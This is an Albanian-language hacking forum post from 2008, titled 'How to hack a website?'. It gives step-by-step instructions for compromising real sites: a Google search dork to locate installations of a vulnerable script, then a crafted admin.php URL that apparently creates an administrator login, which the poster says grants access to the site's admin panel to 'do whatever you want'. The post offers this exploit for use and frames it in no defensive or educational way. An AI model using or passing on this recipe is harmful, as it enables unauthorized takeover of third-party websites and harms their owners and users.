Would you like to react to this message? Create an account in a few clicks or log in to continue.


 
ForumForum  GalleryGallery  KėrkoKėrko  Latest imagesLatest images  RegjistrohuRegjistrohu  identifikimiidentifikimi  

 

 Te Hackim ni webfaqe ?

Shko poshtė 
AutoriMesazh
ReAlKiNg
Xx|♠| BaBuShii |♠|xX
Xx|♠| BaBuShii |♠|xX
ReAlKiNg


Male Numri i postimeve : 150
Emri : Emri :B3$$! Profesioni: Hacking -->>> Location--->> Hacking & Futbolli
Vendodhja : Ana Shmaiit Te Babadimri.!!
Registration date : 16/02/2008

Te Hackim ni webfaqe ? Empty
MesazhTitulli: Te Hackim ni webfaqe ?   Te Hackim ni webfaqe ? Icon_minitimeSat Mar 01, 2008 10:07 am

<HR SIZE=1>
Si Te Hackim ni webfaqe ?

shkoni ne google shkruani keshtu :

inurl:thebox/thebox.php

pastaj gjeni nje webfaqe qaty

edhe e fshini ket "thebox/thebox.php"

dhe ja shtoni ket :

/admin.php?act=write&username=CLK-J35&password=111&aduser=CLK-J35&adpass=111

dhe behet :

webi.com/admin.php?act=write&username=CLK-J35&password=111&aduser=CLK-J35&adpass=111

pastaj do te jet kshtu :

USER:CLK-J35
PASWORD:111

dhe do te qaseni ne admincp , tash boni qka doni met mira klm
Mbrapsht nė krye Shko poshtė
http://www.vs-team.org
 
Te Hackim ni webfaqe ?
Mbrapsht nė krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti pėrgjigjeni temave tė kėtij forumi
 :: ......::|| Hacking & Security ||::...... :: Hacking-
Kėrce tek: